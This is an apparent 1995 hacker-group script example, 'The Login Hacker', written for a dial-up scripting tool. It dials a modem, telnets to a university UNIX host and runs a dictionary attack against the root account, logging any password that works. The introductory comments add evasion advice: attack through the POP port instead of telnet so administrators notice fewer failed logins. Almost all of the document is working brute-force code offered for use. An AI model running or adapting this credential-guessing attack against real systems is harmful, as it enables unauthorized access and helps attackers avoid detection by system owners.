;                     *********  *    *     ****
;                         *      *    *    *
;                         *      ******   *  
;                         *      *    *    *
;                         *      *    *     ****
;
;                         The Hacker's Choice
;                      Part I - The Login Hacker
;                 (c) 1995 by van Hauser/THC of L.o.r.E. BBS
;-----------------------------------------------------------------------------
;
;                          SCRIPT EXAMPLE ONE
;
;    This is the same script as thc_lh.txt but without comments and command
;    descriptions. Note that THIS script is only an example. Of course this
;    system exist and i tested the script on it, i tell you that you shouldnt
;    try to hack unix systems like that if you can connect to it via the
;    internet, cause the Administrator can see the many failed login attempts!
;    You can use the POP port if you can reach the site from the internet.
;    much faster for this and is much less suspicious! Look at script 4
;    how to do that ! .... have phun ... van Hauser
;
; System description : a UNIX System in F........
;    After dialing the number you get an "name>" prompt which is of no
;    importance what you type in there. After any input except just enter
;    you'arrive at the telnet platform. From there you can telnet with the
;    CONNECT command to any server in the university network. After that you
;    get the normal login and password prompt. after 3 times you will be
;    refused and pushed back to the telnet platform.
;
; Also this script does try to hack the root account for sake of examples,
; you should *NEVER* do that! Read LOGINH.DOC about that!
;
;
#DEFINE
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC

#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)

#START
LOG(--------------------------------------------------------------------------)
LOG(TARGET : $PHONE_NR    ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
DIAL
LOG($STRING)
LOG_SESSION_ON
SEND()
SEND()
WAIT4STRING(15,^M,4,GOTO(1),name)
SEND( )
LOG_SESSION_OFF
:2
SEND(CONNECT HACK.THIS.SYSTEM.EDU)
:3
WAIT4STRING(30,^C,1,GOTO(2),ogin:)
SEND(root)
WAIT4STRING(20,^D,1,GOTO(2),assword:)
SEND_NEXT_DIC(1)
IF STRING~ogin: THEN GOTO(3)
IF STRING~refused THEN GOTO(2)
LOG()
LOG($STRING)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Login : root)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)

#END
